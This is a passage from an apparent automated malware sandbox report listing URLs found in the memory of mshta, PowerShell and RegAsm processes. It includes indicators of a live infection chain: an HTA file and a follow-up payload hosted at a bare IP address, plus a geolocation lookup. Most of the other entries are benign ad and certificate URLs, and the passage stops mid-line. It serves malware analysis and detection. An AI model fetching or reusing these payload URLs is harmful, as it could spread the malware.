                    Source: mshta.exe, 00000004.00000003.438838908.00000000026B5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.437632636.00000000026B5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475500690.0000000002F65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487438890.0000000002F65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/uh/newthingtobeonlinefor.htahttp://192.3.220.40/330/uh/newthingtobeonlinefor
                    Source: mshta.exe, 0000000F.00000002.488297453.000000000026A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/uh/newthingtobeonlinefor.htaks
                    Source: mshta.exe, 00000004.00000003.438571721.0000000003301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.442847727.0000000003301000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/uh/newthingtobeonlinefor.htaw
                    Source: mshta.exe, 0000000F.00000003.487926229.00000000002DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/uh/newthingtobeonlinefor.htazzC:
                    Source: powershell.exe, 00000007.00000002.453491405.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.494874589.0000000002853000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/verybest
                    Source: powershell.exe, 00000014.00000002.494874589.0000000002853000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/verybestthingswesharedfornew.tIF
                    Source: powershell.exe, 00000014.00000002.509594544.000000001AAA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/verybestthingswesharedfornew.tIF/
                    Source: powershell.exe, 00000007.00000002.458812046.000000001C2A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/verybestthingswesharedfornew.tIF7
                    Source: powershell.exe, 00000007.00000002.453491405.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.494874589.0000000002853000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/verybestthingswesharedfornew.tIFp
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://acdn.adnxs.com/ast/ast.js
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://b.scorecardresearch.com/beacon.js
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
                    Source: mshta.exe, 00000004.00000003.438571721.0000000003301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.442847727.0000000003301000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C31F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C100000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488297453.00000000002A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473378608.00000000002A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488611411.0000000003930000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487926229.00000000002A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C386000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C38A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.593504050.000000001AB50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                    Source: powershell.exe, 0000001D.00000002.593504050.000000001ABBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entr
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452480910.0000000000272000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.0000000003301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.442847727.0000000003301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C31F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488611411.0000000003930000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C38A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                    Source: mshta.exe, 00000004.00000003.438571721.0000000003301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.442847727.0000000003301000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.538004187.000000001AD53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.509594544.000000001AA98000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.593504050.000000001AB81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverhei
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488611411.0000000003930000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C38A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                    Source: powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.usertru4
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
                    Source: RegAsm.exeString found in binary or memory: http://geoplugin.net/json.gp
                    Source: powershell.exe, 0000000E.00000002.490672178.0000000014A70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.00000000129B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001285E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001491D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: RegAsm.exe, 00000011.00000002.872488880.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpO
                    Source: RegAsm.exe, 00000011.00000002.872488880.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpy
                    Source: powershell.exe, 00000007.00000002.458812046.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.493138621.0000000000538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.cr
                    Source: powershell.exe, 00000007.00000002.453491405.0000000002910000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.473005129.00000000036FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.494874589.0000000002853000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHxwMU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAJhH73?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAhvyvD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtB8UA?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBduP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBnuN?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCLD9?h=368&w=522&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCr7K?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCzBA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXtPP?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzl6aj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17cJeH?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dAYk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dJEo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dLTg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dOHE?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dWNo?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dtuY?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e0XT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e3cA?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: powershell.exe, 00000007.00000002.458200384.0000000012481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488611411.0000000003930000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488297453.00000000002A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473378608.00000000002A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487926229.00000000002A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C38A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C31F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488611411.0000000003930000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C100000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488297453.00000000002A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473378608.00000000002A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487926229.00000000002A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C386000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.593504050.000000001AB50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.0000000003301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.442847727.0000000003301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C31F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488611411.0000000003930000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 